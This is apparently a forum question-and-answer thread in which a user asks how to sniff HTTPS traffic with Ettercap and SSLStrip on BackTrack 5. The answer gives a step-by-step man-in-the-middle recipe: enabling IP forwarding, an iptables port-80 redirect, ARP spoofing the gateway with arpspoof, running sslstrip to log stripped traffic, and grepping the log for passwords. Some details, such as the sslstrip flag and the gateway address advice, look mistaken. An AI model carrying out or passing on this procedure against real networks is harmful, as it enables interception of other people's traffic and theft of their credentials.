HTTPS / SSL sniffing

Question

i am using Backtrack5 for this ..but am stuck ...i am not able to get the data i want, i am using Ettercap and SSL Strip for this...

Does any one here any idea of how to do it ?

Answer 1

Idk how you're doing it, but for me ettercap-gtk (the gui) has always been garbage. I recommend skipping ettercap unless you want easy DNS spoofing, and go another route.

Let me give you some steps, starting with setting up your iptables for this attack (Man in the middle, amirite) and enabling ip_forward(ing)

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1337 (Can choose any port you want to send them to)

Now to be the man in the middle: Here we use arpspoof: arpspoof -i wlan0(or whatever interface) 192.168.1.X(X is the gateway typically .1 or .255)

Then with SSLStrip you can go ahead and ./sslstrip.py -1 1337 -w filename (1337 is the port from earlier, filename is any filename you want to dump the data to)

cat filename(from earlier) and even pipe | grep "password" or whatever you're sniffing for, or you can just dump everything. The file will be filling up with captured/stripped https data.